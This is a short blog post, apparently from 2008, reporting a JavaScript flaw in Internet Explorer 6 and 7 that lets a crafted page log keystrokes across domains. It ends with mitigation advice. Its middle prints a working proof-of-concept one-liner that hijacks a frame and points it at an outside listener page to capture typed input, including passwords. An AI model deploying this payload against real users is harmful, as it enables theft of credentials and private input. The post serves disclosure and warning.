Internet Explorer 6 & 7 critical Javascript exploit
Ghacks has found a critical Javascript vulnerability that effects Internet Explorer 6&7, that can be used to record keystrokes of a user even if he is switching domains. That means that a specifically prepared website can launch some Javascript that records everything the user does afterwards including text input which naturally means usernames and passwords as well.
The following Javascript code, when clicked will open a new window (hackademix.net), it will hijack one of the iframes, and capture keystrokes.
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);
There is no fix for this vulnerability at this moment, if you’re using IE 6, IE7, all you can do is disable Javascript or allow it only on trusted domains. There is an explanation from the same researcher available.
Source:→ Ghacks
No comment yet
-
Pingback from 1FayeC Web Studio :: Web Design and Development » Dropping IE6 support: new trend says:August 15th, 2008 at 8:32 am
[...] diTii [...]
-
Pingback from 2Dear IE6 | 8164 says:August 4th, 2008 at 7:15 pm
[...] someone so complex and polished at the time blinded me from seeing your true flaws. You’re invulnerable, insecure, and high maintenance. You don’t like to follow rules or play nice with others. I [...]
Leave a Response
